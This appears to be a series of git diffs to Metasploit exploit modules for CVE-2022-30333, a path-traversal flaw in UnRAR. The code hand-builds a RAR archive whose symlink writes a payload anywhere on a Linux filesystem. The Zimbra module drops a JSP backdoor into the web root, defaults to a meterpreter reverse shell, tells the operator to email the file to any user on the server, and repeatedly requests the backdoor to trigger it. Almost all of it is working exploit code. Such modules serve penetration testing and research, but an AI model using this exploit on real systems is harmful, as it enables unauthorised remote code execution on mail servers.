 
           The core issue is that when a symbolic link is unRAR'ed, Windows
           symbolic links are not properly validated on Linux systems and can
@@ -27,8 +28,8 @@ class MetasploitModule < Msf::Exploit::Remote
           If a second file in the archive has the same name, it will be written
           to the symbolic link path.
 
-          The Zimbra target creates a RAR file that can exploit the following
-          versions of Zimbra Collaboration:
+          The Zimbra target creates a RAR file that exploits the following
+          versions of Zimbra Collaboration to drop a payload in the web root:
 
           * Zimbra Collaboration 9.0.0 Patch 24 (and earlier)
           * Zimbra Collaboration 8.8.15 Patch 31 (and earlier)
@@ -49,7 +50,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Arch' => [ARCH_X86, ARCH_X64],
         'Payload' => {
           # The RAR file has 4096 bytes of room. The payload is hex-encoded, and
-          # the template is ~1624 bytes long (with worst possible RNG).
+          # the template is ~1624 bytes long (with worst possible RNG). We could
+          # create a larger payload if we desire
           'Space' => (4096 / 2) - 1700
         },
         'Targets' => [
@@ -154,11 +156,17 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Null terminate the path, pad with NUL bytes, and invert the slashes
-    symlink_target = (target_path + "\0").gsub('/', '\\').ljust(0x68, "\0")
+    symlink_target = (target_path + "\0").gsub('/', '\\')
+    while symlink_target.length < 0x68
+      symlink_target.concat(rand(255).chr)
+    end
+
     symlink_name = rand_text_alpha(12)
 
-    # NULL-Pad the data as well
-    data = data.ljust(4096, "\0")
+    # Pad the data to the full length
+    while data.length < 4096
+      data.concat(rand(255).chr)
+    end
 
     # Build a RAR file from pieces, filling in the blanks with our payloads.
     # The RAR format is non-free (and complex), so this is the easiest way to

--- a/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
+++ b/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
@@ -165,23 +165,37 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Pad the data to the full length
     while data.length < 4096
-      data.concat(rand(255).chr)
+      data.concat(rand(255).chr) # TODO
     end
 
     # Build a RAR file from pieces, filling in the blanks with our payloads.
     # The RAR format is non-free (and complex), so this is the easiest way to
     # build a payload file
-    "\x52\x61\x72\x21\x1a\x07\x01\x00\xf3\xe1\x82\xeb\x0b\x01\x05\x07\x00\x06\x01\x01\x80\x80\x80\x00\x9e\xe2\xc4\xf5\x94\x01\x02\x03\x78\x00\x04\x00\xa0\x08\x00\x00\x00\x00\x80\x00\x00\x0c" +
-      symlink_name + # Symlink filename
-      "\x0a\x03\x02\xae\xf0\x37\x1c\x91\x98\xd8\x01\x6c\x05\x02\x00\x68" +
-      symlink_target +
-      "\xf3\xa1\x93\x68\x28\x02\x03\x0b\x80\x20\x04\x80\x20\x20" +
-      [Zlib.crc32(data)].pack('V') +
-      "\x80\x00\x00\x0c" +
-      symlink_name + # Data filename (same as symlink to overwrite it)
-      "\x0a\x03\x02\x00\x36\xe3\x00\x91\x98\xd8\x01" +
-      data +
-      "\x1d\x77\x56\x51\x03\x05\x04\x00"
+    rar = "\x52\x61\x72\x21\x1a\x07\x01\x00\xf3\xe1\x82\xeb\x0b\x01\x05\x07\x00\x06\x01\x01\x80\x80\x80\x00"
+
+    # Create the first section (with the symlink), and attach with its CRC32
+    rar_section1 = ""
+    rar_section1.concat("\x94\x01\x02\x03\x78\x00\x04\x00\xa0\x08\x00\x00\x00\x00\x80\x00\x00\x0c")
+    rar_section1.concat(symlink_name) # Symlink filename
+    rar_section1.concat("\x0a\x03\x02\xae\xf0\x37\x1c\x91\x98\xd8\x01\x6c\x05\x02\x00\x68")
+    rar_section1.concat(symlink_target)
+    rar.concat([Zlib.crc32(rar_section1), rar_section1].pack('Va*'))
+
+    # Create the second section (with the data), and attach with its CRC32
+    rar_section2 = ""
+    rar_section2.concat("\x28\x02\x03\x0b\x80\x20\x04\x80\x20\x20")
+    rar_section2.concat([Zlib.crc32(data)].pack('V'))
+    rar_section2.concat("\x80\x00\x00\x0c")
+    rar_section2.concat(symlink_name) # Data filename (same as symlink to overwrite it)
+    rar_section2.concat("\x0a\x03\x02\x00\x36\xe3\x00\x91\x98\xd8\x01")
+    rar.concat([Zlib.crc32(rar_section2), rar_section2].pack('Va*'))
+
+    rar.concat(data)
+
+    # This tail doesn't seem necessary, but I don't want to mess with it
+    rar.concat("\x1d\x77\x56\x51\x03\x05\x04\x00")
+
+    rar
   end
 
   def exploit

--- a/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
+++ b/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
@@ -45,6 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],
           ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'],
           ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'],
+          ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],
         ],
         'Platform' => 'linux',
         'Arch' => [ARCH_X86, ARCH_X64],
@@ -103,9 +104,9 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),
 
         # Separating the path, filename, and extension allows us to randomize the filename
-        OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../").', nil]),
-        OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory (default: random).', nil]),
-        OptString.new('TARGET_EXTENSION', [ false, 'The extension to add to the filename (default: no extension).', nil]),
+        OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../").']),
+        OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory (default: random).']),
+        OptString.new('TARGET_EXTENSION', [ false, 'The extension to add to the filename (default: no extension).']),
         OptString.new('EncodeAsJsp', [ false, 'Encode the payload as a .jsp file?', false])
       ]
     )
@@ -114,7 +115,7 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         # Took this from multi/handler
         OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),
-        OptInt.new('CheckInterval', [ true, 'The number of seconds to wait while checking for the payload.', 5 ])
+        OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ])
       ]
     )
   end
@@ -143,7 +144,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return nil
     end
 
-    return relative_path
+    relative_path
   end
 
   def encode_as_rar(target_path, data)

--- a/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
+++ b/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
@@ -157,9 +157,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Null terminate the path, pad with NUL bytes, and invert the slashes
     symlink_target = (target_path + "\0").gsub('/', '\\')
-    while symlink_target.length < 0x68
-      symlink_target.concat(rand(255).chr)
-    end
+    symlink_target.concat(rand(255).chr) while symlink_target.length < 0x68
 
     symlink_name = rand_text_alpha(12)
 
@@ -174,7 +172,7 @@ class MetasploitModule < Msf::Exploit::Remote
     rar = "\x52\x61\x72\x21\x1a\x07\x01\x00\xf3\xe1\x82\xeb\x0b\x01\x05\x07\x00\x06\x01\x01\x80\x80\x80\x00"
 
     # Create the first section (with the symlink), and attach with its CRC32
-    rar_section1 = ""
+    rar_section1 = ''
     rar_section1.concat("\x94\x01\x02\x03\x78\x00\x04\x00\xa0\x08\x00\x00\x00\x00\x80\x00\x00\x0c")
     rar_section1.concat(symlink_name) # Symlink filename
     rar_section1.concat("\x0a\x03\x02\xae\xf0\x37\x1c\x91\x98\xd8\x01\x6c\x05\x02\x00\x68")
@@ -182,7 +180,7 @@ class MetasploitModule < Msf::Exploit::Remote
     rar.concat([Zlib.crc32(rar_section1), rar_section1].pack('Va*'))
 
     # Create the second section (with the data), and attach with its CRC32
-    rar_section2 = ""
+    rar_section2 = ''
     rar_section2.concat("\x28\x02\x03\x0b\x80\x20\x04\x80\x20\x20")
     rar_section2.concat([Zlib.crc32(data)].pack('V'))
     rar_section2.concat("\x80\x00\x00\x0c")

--- a/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
+++ b/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
@@ -8,14 +8,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::FILEFORMAT
   include Msf::Exploit::EXE
-  include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Format::RarSymlinkPathTraversal
 
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'UnRAR Path Traversal in Zimbra (CVE-2022-30333)',
+        'Name' => 'UnRAR Path Traversal (CVE-2022-30333)',
         'Description' => %q{
           This module creates a RAR file that exploits CVE-2022-30333, which is a
           path-traversal vulnerability in unRAR that can extract an arbitrary file
@@ -27,12 +26,6 @@ class MetasploitModule < Msf::Exploit::Remote
           therefore write a symbolic link that points anywhere on the filesystem.
           If a second file in the archive has the same name, it will be written
           to the symbolic link path.
-
-          The Zimbra target creates a RAR file that exploits the following
-          versions of Zimbra Collaboration to drop a payload in the web root:
-
-          * Zimbra Collaboration 9.0.0 Patch 24 (and earlier)
-          * Zimbra Collaboration 8.8.15 Patch 31 (and earlier)
         },
         'Author' => [
           'Simon Scannell', # Discovery / initial disclosure (via Sonar)
@@ -43,58 +36,24 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2022-30333'],
           ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],
           ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],
-          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'],
-          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'],
           ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],
         ],
         'Platform' => 'linux',
         'Arch' => [ARCH_X86, ARCH_X64],
         'Payload' => {
-          # The RAR file has 4096 bytes of room. The payload is hex-encoded, and
-          # the template is ~1624 bytes long (with worst possible RNG). We could
-          # create a larger payload if we desire
-          'Space' => (4096 / 2) - 1700
+          # The RAR file has 4096 bytes of space
+          'Space' => 4096
         },
         'Targets' => [
-          [
-            'Zimbra Collaboration Suite',
-            {
-              'Arch' => [ARCH_X86, ARCH_X64, ARCH_JAVA],
-              'DefaultOptions' => {
-                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
-
-                'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/',
-                'TARGET_FILENAME' => nil,
-                'TARGET_EXTENSION' => 'jsp',
-                'DisablePayloadHandler' => false,
-                'RPORT' => 443,
-                'SSL' => true,
-                'EncodeAsJsp' => true
-              }
-            },
-          ],
-          [
-            'Generic RAR file',
-            {
-              'Arch' => [ARCH_X86, ARCH_X64, ARCH_JAVA],
-              'DefaultOptions' => {
-                'DisablePayloadHandler' => true,
-                'TARGET_PATH' => nil,
-                'TARGET_FILENAME' => nil,
-                'TARGET_EXTENSION' => nil,
-                'AllowNoCleanup' => true,
-                'EncodeAsJsp' => false
-              }
-            }
-          ],
+          [ 'Generic RAR file', {} ]
         ],
         'DefaultTarget' => 0,
         'Privileged' => false,
         'DisclosureDate' => '2022-06-28',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
-          'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [IOC_IN_LOGS]
+          'Reliability' => [],
+          'SideEffects' => []
         }
       )
     )
@@ -102,145 +61,19 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),
-
-        # Separating the path, filename, and extension allows us to randomize the filename
-        OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../").']),
-        OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory (default: random).']),
-        OptString.new('TARGET_EXTENSION', [ false, 'The extension to add to the filename (default: no extension).']),
-        OptString.new('EncodeAsJsp', [ false, 'Encode the payload as a .jsp file?', false])
+        OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../" - as well as a filename).']),
+        OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)']),
       ]
     )
-
-    register_advanced_options(
-      [
-        # Took this from multi/handler
-        OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),
-        OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ])
-      ]
-    )
-  end
-
-  # Generate an on-system filename using datastore options
-  def generate_target_filename
-    target_filename = File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..10))
-
-    return target_filename unless datastore['TARGET_EXTENSION']
-
-    "#{target_filename}.#{datastore['TARGET_EXTENSION']}"
-  end
-
-  # Normalize the path traversal and figure out where it is relative to the web root
-  def zimbra_get_public_path(target_filename)
-    # Normalize the path
-    normalized_path = Pathname.new(File.join('/opt/zimbra/data/amavisd/tmp', target_filename)).cleanpath
-
-    # Figure out where it is, relative to the webroot
-    webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/')
-    relative_path = normalized_path.relative_path_from(webroot)
-
-    # Hopefully, we found a path from the webroot to the payload!
-    if relative_path.to_s.start_with?('../')
-      print_warning('Could not determine the public web path, disabling payload triggering')
-      return nil
-    end
-
-    relative_path
-  end
-
-  def encode_as_rar(target_path, data)
-    unless target_path.length < 0x68
-      fail_with(Failure::BadConfig, 'The configured TARGET_PATH is too long (max length: 103 characters)')
-    end
-
-    unless data.length < 4096
-      fail_with(Failure::BadConfig, "The payload is too long (max length: 4096 bytes, it was #{data.length})")
-    end
-
-    # Null terminate the path, pad with NUL bytes, and invert the slashes
-    symlink_target = (target_path + "\0").gsub('/', '\\')
-    symlink_target.concat(rand(255).chr) while symlink_target.length < 0x68
-
-    symlink_name = rand_text_alpha(12)
-
-    # Pad the data to the full length
-    while data.length < 4096
-      data.concat(rand(255).chr) # TODO
-    end
-
-    # Build a RAR file from pieces, filling in the blanks with our payloads.
-    # The RAR format is non-free (and complex), so this is the easiest way to
-    # build a payload file
-    rar = "\x52\x61\x72\x21\x1a\x07\x01\x00\xf3\xe1\x82\xeb\x0b\x01\x05\x07\x00\x06\x01\x01\x80\x80\x80\x00"
-
-    # Create the first section (with the symlink), and attach with its CRC32
-    rar_section1 = ''
-    rar_section1.concat("\x94\x01\x02\x03\x78\x00\x04\x00\xa0\x08\x00\x00\x00\x00\x80\x00\x00\x0c")
-    rar_section1.concat(symlink_name) # Symlink filename
-    rar_section1.concat("\x0a\x03\x02\xae\xf0\x37\x1c\x91\x98\xd8\x01\x6c\x05\x02\x00\x68")
-    rar_section1.concat(symlink_target)
-    rar.concat([Zlib.crc32(rar_section1), rar_section1].pack('Va*'))
-
-    # Create the second section (with the data), and attach with its CRC32
-    rar_section2 = ''
-    rar_section2.concat("\x28\x02\x03\x0b\x80\x20\x04\x80\x20\x20")
-    rar_section2.concat([Zlib.crc32(data)].pack('V'))
-    rar_section2.concat("\x80\x00\x00\x0c")
-    rar_section2.concat(symlink_name) # Data filename (same as symlink to overwrite it)
-    rar_section2.concat("\x0a\x03\x02\x00\x36\xe3\x00\x91\x98\xd8\x01")
-    rar.concat([Zlib.crc32(rar_section2), rar_section2].pack('Va*'))
-
-    rar.concat(data)
-
-    # This tail doesn't seem necessary, but I don't want to mess with it
-    rar.concat("\x1d\x77\x56\x51\x03\x05\x04\x00")
-
-    rar
   end
 
   def exploit
-    payload = generate_payload_exe
-
-    if datastore['EncodeAsJsp']
-      print_status('Encoding the payload as a .jsp file')
-      payload = Msf::Util::EXE.to_jsp(payload)
+    print_status("Target filename: #{datastore['TARGET_PATH']}")
+    rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), datastore['TARGET_PATH'], payload.encoded)
+    if rar.nil?
+      fail_with(Failure::BadConfig, 'Failed to encode RAR file')
     end
 
-    # Create a file
-    target_filename = generate_target_filename
-    print_status("Target filename: #{target_filename}")
-    file_create(encode_as_rar(target_filename, payload))
-
-    # If it's Zimbra, try to trigger the payload
-    if target.name == 'Zimbra Collaboration Suite'
-      print_good('File created! Email the file above to any user on the target Zimbra server')
-
-      # Get the public path for triggering the vulnerability, terminate if we
-      # can't figure it out
-      public_filename = zimbra_get_public_path(target_filename)
-      return if public_filename.nil?
-
-      register_file_for_cleanup(target_filename)
-
-      # This loop is mostly from `multi/handler`
-      stime = Time.now.to_f
-      timeout = datastore['ListenerTimeout'].to_i
-      loop do
-        break if session_created?
-        break if timeout > 0 && (stime + timeout < Time.now.to_f)
-
-        print_status("Trying to trigger the backdoor @ #{public_filename}...")
-
-        res = send_request_cgi(
-          'method' => 'GET',
-          'uri' => normalize_uri(public_filename)
-        )
-
-        unless res
-          fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload')
-        end
-
-        Rex::ThreadSafe.sleep(datastore['CheckInterval'].to_i)
-      end
-    end
+    file_create(rar)
   end
 end

--- a/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
+++ b/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
@@ -69,9 +69,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     print_status("Target filename: #{datastore['TARGET_PATH']}")
-    rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), datastore['TARGET_PATH'], payload.encoded)
-    if rar.nil?
-      fail_with(Failure::BadConfig, 'Failed to encode RAR file')
+
+    begin
+      rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), datastore['TARGET_PATH'], payload.encoded)
+    rescue StandardError => e
+      fail_with(Failure::BadConfig, "Failed to encode RAR file: #{e.to_s}")
     end
 
     file_create(rar)

--- a/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
+++ b/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
@@ -64,6 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'RPORT' => 443,
           'SSL' => true
         },
+        'Stance' => Msf::Exploit::Stance::Passive,
         'DefaultTarget' => 0,
         'Privileged' => false,
         'DisclosureDate' => '2022-06-28',

--- a/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
+++ b/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
@@ -1,0 +1,174 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Format::RarSymlinkPathTraversal
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'UnRAR Path Traversal in Zimbra (CVE-2022-30333)',
+        'Description' => %q{
+          This module creates a RAR file that can be emailed to a Zimbra server
+          to exploit CVE-2022-30333. If successful, it plants a JSP-based
+          backdoor in the public web directory, then executes that backdoor.
+
+          The core vulnerability is a path-traversal issue in unRAR that can
+          extract an arbitrary file to an arbitrary location on a Linux system.
+
+          This issue is exploitable on the following versions of Zimbra, provided
+          UnRAR version 6.11 or earlier is installed:
+
+          * Zimbra Collaboration 9.0.0 Patch 24 (and earlier)
+          * Zimbra Collaboration 8.8.15 Patch 31 (and earlier)
+        },
+        'Author' => [
+          'Simon Scannell', # Discovery / initial disclosure (via Sonar)
+          'Ron Bowes', # Analysis, PoC, and module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2022-30333'],
+          ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],
+          ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],
+          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'],
+          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'],
+          ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],
+        ],
+        'Platform' => 'linux',
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Payload' => {
+          # The RAR file has 4096 bytes of room. The payload is hex-encoded, and
+          # the JSP template is ~1624 bytes long (with worst possible RNG). We
+          # could create a larger template if desired, but it's a pain because
+          # we have to do file carving
+          'Space' => (4096 / 2) - 1700
+        },
+        'Targets' => [
+          [ 'Zimbra Collaboration Suite', {} ]
+        ],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+          'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/',
+          'TARGET_FILENAME' => nil,
+          'DisablePayloadHandler' => false,
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2022-06-28',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),
+
+        # Separating the path, filename, and extension allows us to randomize the filename
+        OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../").']),
+        OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)']),
+        OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]),
+
+        # Took this from multi/handler
+        OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),
+        OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ])
+      ]
+    )
+  end
+
+  # Generate an on-system filename using datastore options
+  def generate_target_filename
+    if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')
+      print_Warning('TARGET_FILENAME does not end with .jsp, was that intentional?')
+    end
+
+    File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || "#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp")
+  end
+
+  # Normalize the path traversal and figure out where it is relative to the web root
+  def zimbra_get_public_path(target_filename)
+    # Normalize the path
+    normalized_path = Pathname.new(File.join('/opt/zimbra/data/amavisd/tmp', target_filename)).cleanpath
+
+    # Figure out where it is, relative to the webroot
+    webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/')
+    relative_path = normalized_path.relative_path_from(webroot)
+
+    # Hopefully, we found a path from the webroot to the payload!
+    if relative_path.to_s.start_with?('../')
+      print_warning('Could not determine the public web path, disabling payload triggering')
+      return nil
+    end
+
+    relative_path
+  end
+
+  def exploit
+    print_status('Encoding the payload as a .jsp file')
+    payload = Msf::Util::EXE.to_jsp(generate_payload_exe)
+
+    # Create a file
+    target_filename = generate_target_filename
+    print_status("Target filename: #{target_filename}")
+    rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload)
+    if rar.nil?
+      fail_with(Failure::BadConfig, 'Failed to encode RAR file')
+    end
+
+    file_create(rar)
+
+    print_good('File created! Email the file above to any user on the target Zimbra server')
+
+    # Bail if they don't want the payload triggered
+    return unless datastore['TRIGGER_PAYLOAD']
+
+    # Get the public path for triggering the vulnerability, terminate if we
+    # can't figure it out
+    public_filename = zimbra_get_public_path(target_filename)
+    return if public_filename.nil?
+
+    register_file_for_cleanup(target_filename)
+
+    # This loop is mostly from `multi/handler`
+    stime = Time.now.to_f
+    timeout = datastore['ListenerTimeout'].to_i
+    loop do
+      break if session_created?
+      break if timeout > 0 && (stime + timeout < Time.now.to_f)
+
+      print_status("Trying to trigger the backdoor @ #{public_filename}...")
+
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(public_filename)
+      )
+
+      unless res
+        fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload')
+      end
+
+      Rex::ThreadSafe.sleep(datastore['CheckInterval'].to_i)
+    end
+  end
+end

--- a/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
+++ b/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
@@ -148,6 +148,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_file_for_cleanup(target_filename)
 
+    interval = datastore['CheckInterval'].to_i
+    print_status("Trying to trigger the backdoor @ #{public_filename} every #{interval}s [backgrounding]...")
+
     # This loop is mostly from `multi/handler`
     stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i
     timeout = datastore['ListenerTimeout'].to_i
@@ -155,7 +158,6 @@ class MetasploitModule < Msf::Exploit::Remote
       break if session_created?
       break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i)
 
-      print_status("Trying to trigger the backdoor @ #{public_filename}...")
 
       res = send_request_cgi(
         'method' => 'GET',
@@ -166,7 +168,7 @@ class MetasploitModule < Msf::Exploit::Remote
         fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload')
       end
 
-      Rex::ThreadSafe.sleep(datastore['CheckInterval'].to_i)
+      Rex::ThreadSafe.sleep(interval)
     end
   end
 end

--- a/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
+++ b/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
@@ -131,9 +131,11 @@ class MetasploitModule < Msf::Exploit::Remote
     # Create a file
     target_filename = generate_target_filename
     print_status("Target filename: #{target_filename}")
-    rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload)
-    if rar.nil?
-      fail_with(Failure::BadConfig, 'Failed to encode RAR file')
+
+    begin
+      rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload)
+    rescue StandardError => e
+      fail_with(Failure::BadConfig, "Failed to encode RAR file: #{e.to_s}")
     end
 
     file_create(rar)

--- a/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
+++ b/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
@@ -117,7 +117,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Hopefully, we found a path from the webroot to the payload!
     if relative_path.to_s.start_with?('../')
-      print_warning('Could not determine the public web path, disabling payload triggering')
       return nil
     end
 
@@ -146,7 +145,10 @@ class MetasploitModule < Msf::Exploit::Remote
     # Get the public path for triggering the vulnerability, terminate if we
     # can't figure it out
     public_filename = zimbra_get_public_path(target_filename)
-    return if public_filename.nil?
+    if public_filename.nil?
+      print_warning('Could not determine the public web path, disabling payload triggering')
+      return
+    end
 
     register_file_for_cleanup(target_filename)
 

--- a/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
+++ b/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
@@ -135,7 +135,7 @@ class MetasploitModule < Msf::Exploit::Remote
     begin
       rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload)
     rescue StandardError => e
-      fail_with(Failure::BadConfig, "Failed to encode RAR file: #{e.to_s}")
+      fail_with(Failure::BadConfig, "Failed to encode RAR file: #{e}")
     end
 
     file_create(rar)

--- a/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
+++ b/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
@@ -158,7 +158,6 @@ class MetasploitModule < Msf::Exploit::Remote
       break if session_created?
       break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i)
 
-
       res = send_request_cgi(
         'method' => 'GET',
         'uri' => normalize_uri(public_filename)

--- a/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
+++ b/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
@@ -46,13 +46,6 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'Platform' => 'linux',
         'Arch' => [ARCH_X86, ARCH_X64],
-        'Payload' => {
-          # The RAR file has 4096 bytes of room. The payload is hex-encoded, and
-          # the JSP template is ~1624 bytes long (with worst possible RNG). We
-          # could create a larger template if desired, but it's a pain because
-          # we have to do file carving
-          'Space' => (4096 / 2) - 1700
-        },
         'Targets' => [
           [ 'Zimbra Collaboration Suite', {} ]
         ],

--- a/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
+++ b/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
@@ -156,11 +156,11 @@ class MetasploitModule < Msf::Exploit::Remote
     register_file_for_cleanup(target_filename)
 
     # This loop is mostly from `multi/handler`
-    stime = Time.now.to_f
+    stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i
     timeout = datastore['ListenerTimeout'].to_i
     loop do
       break if session_created?
-      break if timeout > 0 && (stime + timeout < Time.now.to_f)
+      break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i)
 
       print_status("Trying to trigger the backdoor @ #{public_filename}...")
 


